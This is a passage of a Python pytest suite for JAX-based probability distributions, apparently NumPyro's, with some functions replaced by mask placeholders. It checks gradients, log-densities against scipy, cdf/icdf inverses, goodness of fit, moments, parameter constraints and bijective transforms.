== batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if 'Improper' in jax_dist.__name__:\n pytest.skip('distribution has improper .log_prob()')\n if 'LKJ' in jax_dist.__name__:\n pytest.xfail('incorrect submanifold scaling')\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\n 'EulerMaruyama skip test when event shape is non-trivial.')\n num_samples = 10000\n if 'BetaProportion' in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if 'Dirichlet' in jax_dist.__name__:\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip('expensive test')\n else:\n assert gof > TEST_FAILURE_RATE\n\n\n<mask token>\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w ** 2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected]('dimension', [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(jax.jacobian(\n _tril_cholesky_to_tril_corr)(sample_tril))[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n corr_log_prob = np.array(corr_log_prob)\n assert_allclose(corr_log_prob, jnp.broadcast_to(corr_log_prob[0],\n corr_log_prob.shape), rtol=1e-06)\n if dimension == 2:\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-06)\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip('Improper distribution does not has mean/var implemented')\n if jax_dist is FoldedNormal:\n pytest.skip('Folded distribution does not has mean/var implemented')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\n 'EulerMaruyama distribution does not has mean/var implemented')\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\n 'RelaxedBernoulli distribution does not has mean/var implemented')\n if 'SineSkewed' in jax_dist.__name__:\n pytest.skip('Skewed Distribution are not symmetric about location.')\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, dist.\n LeftTruncatedDistribution, dist.RightTruncatedDistribution, dist.\n TwoSidedTruncatedDistribution):\n pytest.skip('Truncated distributions do not has mean/var implemented')\n if jax_dist is dist.ProjectedNormal:\n pytest.skip('Mean is defined in submanifold')\n n = 20000 if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.\n SineBivariateVonMises] else 200000\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n if sp_dist and not _is_batched_multivariate(d_jax) and jax_dist not in [\n dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]:\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError:\n sp_mean = d_sp.mean\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError:\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-07)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-07)\n if jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n marginal = dist.Beta(concentration + 0.5 * (dimension - 2), \n concentration + 0.5 * (dimension - 2))\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(jnp.reshape(marginal_mean, jnp.\n shape(marginal_mean) + (1, 1)), jnp.shape(marginal_mean) +\n d_jax.event_shape)\n expected_std = jnp.broadcast_to(jnp.reshape(marginal_std, jnp.shape\n (marginal_std) + (1, 1)), jnp.shape(marginal_std) + d_jax.\n event_shape)\n expected_mean = expected_mean * (1 - jnp.identity(dimension)\n ) + jnp.identity(dimension)\n expected_std = expected_std * (1 - jnp.identity(dimension))\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol\n =0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=0.01)\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n expected_variance = 1 - jnp.sqrt(x ** 2 + y ** 2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=0.01\n )\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n assert_allclose(d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = 200000,\n if len(d_jax.batch_shape) > 0:\n axes = [(len(sample_shape) + i) for i in range(len(d_jax.\n batch_shape))]\n axes = tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n ix_loc = get_min_shape(ix, d_jax.loc.shape[:len(ix)])\n jnp.allclose(jnp.mean(samples_re[ix], 0), jnp.squeeze(d_jax\n .mean[ix_loc]), rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order='F')\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[:\n len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[:len(ix)]\n )\n scale_tril = my_kron(d_jax.scale_tril_column[ix_col], d_jax\n .scale_tril_row[ix_row])\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01\n )\n else:\n jnp.allclose(jnp.mean(samples, 0), jnp.squeeze(d_jax.mean),\n rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,),\n order='F')\n scale_tril = my_kron(jnp.squeeze(d_jax.scale_tril_column), jnp.\n squeeze(d_jax.scale_tril_row))\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\n 'CAR distribution does not have `variance` implemented.')\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\n 'Gompertz distribution does not have `variance` implemented.')\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\[email protected]('constraint, x, expected', [(constraints.boolean,\n np.array([True, False]), np.array([True, True])), (constraints.boolean,\n np.array([1, 1]), np.array([True, True])), (constraints.boolean, np.\n array([-1, 1]), np.array([False, True])), (constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False\n ])), (constraints.corr_cholesky, np.array([[[1, 0], [1, 0]], [[1, 0], [\n 0.5, 0.5]]]), np.array([False, False])), (constraints.corr_matrix, np.\n array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False])),\n (constraints.corr_matrix, np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, \n 0.5]]]), np.array([False, False])), (constraints.greater_than(1), 3, \n True), (constraints.greater_than(1), np.array([-1, 1, 5]), np.array([\n False, False, True])), (constraints.integer_interval(-3, 5), 0, True),\n (constraints.integer_interval(-3, 5), np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False])), (constraints.\n interval(-3, 5), 0, True), (constraints.interval(-3, 5), np.array([-5, \n -3, 0, 5, 7]), np.array([False, True, True, True, False])), (\n constraints.less_than(1), -2, True), (constraints.less_than(1), np.\n array([-1, 1, 5]), np.array([True, False, False])), (constraints.\n lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True), (\n constraints.lower_cholesky, np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0,\n 0.1], [2.0, 0.2]]]), np.array([False, False])), (constraints.\n nonnegative_integer, 3, True), (constraints.nonnegative_integer, np.\n array([-1.0, 0.0, 5.0]), np.array([False, True, True])), (constraints.\n positive, 3, True), (constraints.positive, np.array([-1, 0, 5]), np.\n array([False, False, True])), (constraints.positive_definite, np.array(\n [[1.0, 0.3], [0.3, 1.0]]), True), (constraints.positive_definite, np.\n array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]), np.array([\n False, False])), (constraints.positive_integer, 3, True), (constraints.\n positive_integer, np.array([-1.0, 0.0, 5.0]), np.array([False, False, \n True])), (constraints.real, -1, True), (constraints.real, np.array([np.\n inf, -np.inf, np.nan, np.pi]), np.array([False, False, False, True])),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True), (constraints.\n simplex, np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False])), (constraints.softplus_positive, 3, \n True), (constraints.softplus_positive, np.array([-1, 0, 5]), np.array([\n False, False, True])), (constraints.softplus_lower_cholesky, np.array([\n [1.0, 0.0], [-2.0, 0.1]]), True), (constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]), np.\n array([False, False])), (constraints.unit_interval, 0.1, True), (\n constraints.unit_interval, np.array([-5, 0, 0.5, 1, 7]), np.array([\n False, True, True, True, False])), (constraints.sphere, np.array([[1, 0,\n 0], [0.5, 0.5, 0]]), np.array([True, False])), (constraints.\n open_interval(0.0, 1.0), np.array([-5, 0, 0.5, 1, 7]), np.array([False,\n False, True, False, False]))])\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == 'float32' or jnp.result_type(v) == 'float64':\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected\n ), True))\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-07)\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n 